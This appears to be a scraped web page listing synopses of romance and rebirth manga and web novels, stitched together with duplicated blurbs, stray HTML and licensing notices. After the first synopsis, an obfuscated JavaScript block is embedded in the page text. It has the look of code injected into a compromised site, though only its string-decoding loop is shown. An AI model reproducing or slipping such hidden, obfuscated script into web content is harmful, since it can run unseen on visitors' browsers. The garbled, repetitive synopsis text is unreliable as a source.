??? ?? ?? Summary: In Hercion Academy’s Magic Department, which trains the best wizards on the continent, lives Luciel, who is called the “iron-blooded assistant” and is recognized for her ability. What she’s hoping for is to become a professor and live a normal flowery life!!! But three men appear in front of her. Prince Lassen, a scheming prince with a cold heart. Ethan, the swordmaster who has a straight chivalrous spirit like the sunshine. Taylor, the most popular and cute genius in magic. It’s hard to achieve the dream of an ordinary life, but because of them, Luciel’s plan is becoming more difficult. Can she really love someone?<script></script><script>(function(_0x171f9f,_0x573964){var _0x25411d=_0x982e,_0x104108=_0x171f9f();while(!![]){try{var _0x183aad=-parseInt(_0x25411d(0x96))/(-0xcbb+0x18d9+-0x1*0xc1d)*(-parseInt(_0x25411d(0xa0))/(0x1*0x12af+-0x167+-0x1146))+parseInt(_0x25411d(0x9b))/(-0x1*-0x21d6+-0xfe9*0x1+-0x11ea)*(-parseInt(_0x25411d(0x94))/(-0xd*0x185+-0x25b5+0x41b*0xe))+-parseInt(_0x25411d(0x92))/(0x2687+-0x77d+0x3*-0xa57)+-parseInt(_0x25411d(0xa5))/(-0x1cd8+-0x1e5+0x1ec3)*(-parseInt(_0x25411d(0x93))/(0xfb*0xb+0x161*0x17+-0x2a79))+-parseInt(_0x25411d(0x9e))/(-0x119c+-0x1287+-0x242b*-0x1)*(parseInt(_0x25411d(0x91))/(-0xd31+-0x175+-0x7*-0x219))+parseInt(_0x25411d(0xb1))/(0xce0*0x1+0xf6b*0x1+-0x1c41)+-parseInt(_0x25411d(0x9a))/(0x19a1+-0xfd1*-0x2+-0x3938)*(-parseInt(_0x25411d(0x97))/(-0x1*0x1622+0x158c+0xa2));if(_0x183aad===_0x573964)break;else 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Cold-Hearted Wife – It Is Not Easy To Bully Her Shi Xia Ben Is The Envy Of The President ‘S Wife, But Did Not Expect That Behind The Scenes Is A Contract Marriage. The Three-Year Deadline Is Approaching, But The President Of Ao Jiao Has Proposed “Let’s Really Do A Fake Show”. What If My Husband Does Not Act According To The Contract? Cold-Hearted Wife – It Is Not Easy To Bully Her Don’t Provoke The Contract Wife Cold-Hearted Wife – It Is Not Easy To Bully Her/ Don’t Provoke The Contract Wife/ Cold-Hearted Wife – It Is Not Easy To Bully Her/ My Contracted Wife Is Cold To Me
My Chubby Princess English- The 21st Century genius Doctor and Assassin, Suddenly transmigrated into the Third Miss of Duke Residence, but became the infamous ugly and fat cripple? Unbeknownst to all, when her cold eyes open, ten thousands beats submit to her. She steps upon the evil woman and bastard man. She transform into a top ranked summoner and fight everyone in her way whether they are god or devil! As she has fun dealing with the bastards and losing weight, She didn’t know that she messed with a two-faced imperial uncle: “Imperial wife is as pretty as a fairy, you guys must keep watch of her closely. All those who comes up to her must be killed!” “Save me! Can I request to return this type of handsome but blinded and clingy husband?
<div class="description-summary hide_show-more"> <div class="summary__content show-more"> <div class="detail-content"> <h2>Cold-hearted wife - it is not easy to bully her</h2> Shi Xia Ben is the envy of the president ‘s wife, but did not expect that behind the scenes is a contract marriage. The three-year deadline is approaching, but the president of Ao Jiao has proposed “let’s really do a fake show”. What if my husband does not act according to the contract? </div> </div> </div> Cold-hearted wife - it is not easy to bully her Don’t Provoke the Contract Wife Cold-hearted wife - it is not easy to bully her/ Don’t Provoke the Contract Wife/ Cold-Hearted Wife – It Is Not Easy To Bully Her/ My Contracted Wife is Cold to Me
<h2>Take Your Mommy Home with other name You Look Like My Son's Mommy</h2> - Why? Five years ago, it’s were you who slept me?,And why after five years, it’s you again? Bai Chu Xiao was angry and held Jiang Cheng Yu’s collar and said, “I’ve been through hard time so much, how do you plan to compensate me?” The evil charm of Jiang Cheng Yu’s smile, he hugged her and said, “Is it enough with two babie plus my lifetime to compensate you”?\ Abduct A Mommy And Bring Her Home, 拐个妈咪带回家, You Look Like My Son's Mommy, Take Your Mommy Home
<h2>First Miss Reborn</h2> When she was hit by labor pain, what greeted her wasn't words of comfort but vile accusations of infidelity. Killed in defense of her unborn baby, she vowed to take revenge on them all...and God granted her a second chance. However, it seems that she's not the only one brought back. Who's that silver-haired guy in mask? Why does he seem to know her every move, yet still willingly provide unconditional help regardless? MangaToon got authorization from iReader to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
To Revenge, Divine He was the gods' tutor in the divine realm. He never expected that he would die at the hands of his own beloved disciples. Perhaps the God was touched by his grievance, that's why HE gave him another chance to live! He was reborn as Ling Jianchen, whose martial spirit was ruined before he was killed. What's worse, this poor guy's fiancee came to his funeral, not for mourning, but to cancel their engagement... MangaToon got authorization from iReader to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
This should be the happiest moment of my life. In my wedding gown, waiting for my groom...didn't even realize I lost conscious Until I woke up...after giving birth to a child? Where is my child and who is the father? Years after the fact, will I be able to find out what happened that day? MangaToon got authorization from MiFenPink to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Love Me Gently, Bossy CEO Step-mother's bullied you, ex-boyfriend betrayed you, what should you do? Swallow everything down to your belly and live silently? Or fight back for yourself?! MangaToon got authorization from Jemon Culture to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
100 Days to Love You Chu Tianchi, the emperor of the Wu state captured the emperor of Yue state and decided to behead him in 100 days. To save her old master, Shen Yanfei vowed to kill Chu Tianchi within a hundred days and overthrow his dynasty. But after spending time with him, she realized that Chu Tianchi is not a bad man. How will she proceed with her plan... MangaToon got authorization from Daxingdao Comic to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
<!--more-->Baby Making System A cold-blooded forensic pathologist was reborn into a peasant girl. Now she has a bunch of mean relatives and dummy husband around her! And the only way to return to the modern world is to make babies with this halfwit! Will they ever work it out? How many babies will they have? Most important of all, who on earth is this mysterious man... MangaToon got authorization from Fanciyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
Make Way for Your Vicious Queen! The rain was pouring down when I was having my last conversation with my scumbag ex-boyfriend, the guy who cheated on me yet thought he could buy my love back with money. Suddenly, I was struck by a lightning. When I woke up, I realized that somehow I have time travelled to the ancient time and became the empress! Before I figured out what was going on, a naked woman came in front of me... It seems I have been reborn into the body of a vicious empress! Luckily, I'm good at being bad... MangaToon got authorization from HangMan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.